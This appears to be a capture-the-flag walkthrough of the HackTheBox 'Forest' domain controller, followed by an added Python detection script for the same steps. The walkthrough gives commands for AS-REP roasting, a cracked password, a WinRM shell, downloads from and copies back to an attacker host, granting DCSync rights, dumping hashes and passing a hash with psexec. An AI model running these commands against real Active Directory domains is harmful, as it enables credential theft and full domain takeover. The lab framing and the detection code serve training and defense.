Again, we start with nmap -sC -sV -oA ./forest 10.10.10.161
Here we have a Windows Server 2016 running DNS, SMB, LDAP, and a few other niceties but, surprisingly, no web ports. Combine LDAP with the name of the box, "Forest", and we can be fairly certain that this is a Domain Controller and that we are attacking LDAP. So, first off, let's check the LDAP service to see if anonymous binding is enabled. We do this with
ldapsearch -h 10.10.10.161 -p 389 -x -b "dc=htb,dc=local"
In ldapsearch, -h is the host, -p is the port, -x selects simple authentication (with no bind DN, an anonymous bind), and -b is the base distinguished name, which we can pull from the SMB response in the nmap output. The output is too large to add here, but is in the above CTB file. In line 7,826 (not joking) of the ldapsearch output, we find svc-alfresco. Alfresco is a content and process service. One of their support documents, here, tells us that Kerberos pre-authentication must be off in order for Alfresco to work with AD. Excellent! That means we can request a Kerberos ticket as svc-alfresco. Somebody didn't think that one through. If we do a Google search for Kerberoast with Alfresco, our top result is Roasting AS-REPs. Using GetNPUsers.py from impacket, we can grab the hash.
Let's use hashcat to break it.
So, the password is s3rvice. That's just laziness right there. It's a Windows box, so SSH is out. Let's expand our port scan and see if any other Remote Access Tools (RATs) are available.
Interestingly enough, we do find another port open: 47001, with WinRM running on it.
To exploit WinRM, let's use Evil-WinRM, which can be found on the HackPlayers github here.
So, with ruby evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice, we get a low-level shell. Let's now map out the domain and see what privileges everyone has. First, let's get BloodHound onto the target. You can get BloodHound here (or just use pip install bloodhound or apt-get install bloodhound; I went the apt-get direction), and I highly recommend it. For AD mapping it's a powerful tool. To get it to the target, set up a simple HTTP server and use:
python3 -m http.server 8081
(new-object System.Net.WebClient).DownloadFile('http://YOURIP:PORT/SharpHound.exe', 'C:\Users\svc-alfresco\Desktop\SharpHound.exe')
Running SharpHound will create 2 new files. You need to get those files back to your machine. Easily done with a little certutil magic.
Next, we can use the smbserver.py from impacket to move the files over. Create an smb folder, and then run:
sudo python3 /impacket/examples/smbserver.py share smb
Copy-Item -Path ./20200401143304_BloodHound.zip -Destination \\10.10.XX.XX\share\20200401143304_BloodHound.zip;
Copy-Item -Path ./MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin -Destination \\10.10.XX.XX\share\MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin;
The files are now on your machine. Time to fire up BloodHound. To start, use:
sudo neo4j console
If this is your first time using BloodHound, or you are using it for the first time on a fresh install, you first need to go to http://localhost:7474 and change the neo4j:neo4j default credential. When you run BloodHound, you'll need to use those new creds. Set your starting "node" as firstname.lastname@example.org. When BloodHound shows you the user, right click on it and select "Mark User as Owned". Click on the 3 stacked horizontal lines (the hamburger :D) and select the Queries tab. From there, select "Shortest Paths from Owned Principals".
The graph shows that svc-alfresco has permissions to:
1) Create an account (Account Operators)
2) Add users to Exchange Windows Permissions (Because Account Operators has Generic All permissions on Exchange Windows Permissions)
3) Exchange Windows Permissions has WriteDACL to the Domain.
I'm going to rapid fire the next few commands. We are going to create a new user, add that user to the Exchange Windows Permissions group, and then use the new user and PowerSploit to dump all of the password hashes. Here goes:
net user uvbeenhacked password /add /domain
net group "Exchange Windows Permissions" /add uvbeenhacked
Switch to the attacking machine and the directory PowerView is in (PowerSploit/Recon/PowerView.ps1)
python -m SimpleHTTPServer 8081
Switch BACK to the victim
(new-object System.Net.WebClient).DownloadFile('http://10.10.XX.XX:8081/PowerView.ps1', 'C:\Users\svc-alfresco\Desktop\PowerView.ps1')
$pass = convertto-securestring 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\uvbeenhacked', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity uvbeenhacked -Rights DCSync
Switch back to the Attacking Machine
sudo python3 /impacket/examples/secretsdump.py htb.local\uvbeenhacked:email@example.com
From here, we can pass the hash to get an Administrator shell using:
/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 firstname.lastname@example.org
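From the blue-team side, the two pivotal steps of this box (the AS-REP roast of svc-alfresco and the DCSync from the new user) both leave distinctive Windows Security events. The following is an added example, not part of the original writeup: detection logic run over constructed event records shaped like 4768 (TGT request), 4728/4732/4756 (group membership added) and 4662 (directory object access). The field names, the DC name DC01 and the user jdoe are assumptions for the sample data.

```python
# Added example (not from the original walkthrough): flag AS-REP roasting,
# DCSync and additions to the groups abused above, over constructed events.
from dataclasses import dataclass

# Well-known control-access-right GUIDs that a DCSync (secretsdump) needs.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
GROUP_ADD_EVENTS = {4728, 4732, 4756}  # member added to global/local/universal group
WATCHED_GROUPS = {"exchange windows permissions", "account operators"}

@dataclass
class Finding:
    event_id: int
    account: str
    reason: str

def detect(events, domain_controllers):
    """Return Findings for AS-REP roasting, DCSync and watched-group additions."""
    findings = []
    dcs = {dc.lower() for dc in domain_controllers}
    for ev in events:
        eid = ev["EventID"]
        acct = ev.get("SubjectUserName") or ev.get("TargetUserName", "")
        # 4768 with Pre-Authentication Type 0 and RC4 (0x17): TGT handed out
        # with no pre-auth, which is exactly what GetNPUsers.py collects.
        if eid == 4768 and ev.get("PreAuthType") == 0 and ev.get("TicketEncryptionType") == 0x17:
            findings.append(Finding(eid, acct, "TGT issued without pre-auth using RC4 (AS-REP roast)"))
        # 4662 exercising replication rights from anything that is not a DC.
        elif eid == 4662 and acct.lower().rstrip("$") not in dcs:
            if {g.lower() for g in ev.get("Properties", [])} & REPL_GUIDS:
                findings.append(Finding(eid, acct, "replication rights used by non-DC account (DCSync)"))
        elif eid in GROUP_ADD_EVENTS and ev.get("TargetGroup", "").lower() in WATCHED_GROUPS:
            findings.append(Finding(eid, acct, f"member added to {ev['TargetGroup']}"))
    return findings

# Constructed sample events mirroring the steps of this walkthrough.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-alfresco", "PreAuthType": 0, "TicketEncryptionType": 0x17},
    {"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": 2, "TicketEncryptionType": 0x12},
    {"EventID": 4728, "SubjectUserName": "svc-alfresco", "TargetUserName": "uvbeenhacked",
     "TargetGroup": "Exchange Windows Permissions"},
    {"EventID": 4662, "SubjectUserName": "uvbeenhacked",
     "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"EventID": 4662, "SubjectUserName": "DC01$",  # legitimate DC-to-DC replication
     "Properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS, ["DC01"]):
        print(finding)
```

The normal 4768 with pre-auth type 2 and the DC's own replication event are deliberately left unflagged, so the three findings correspond one-to-one to the roast, the group add and the secretsdump run above.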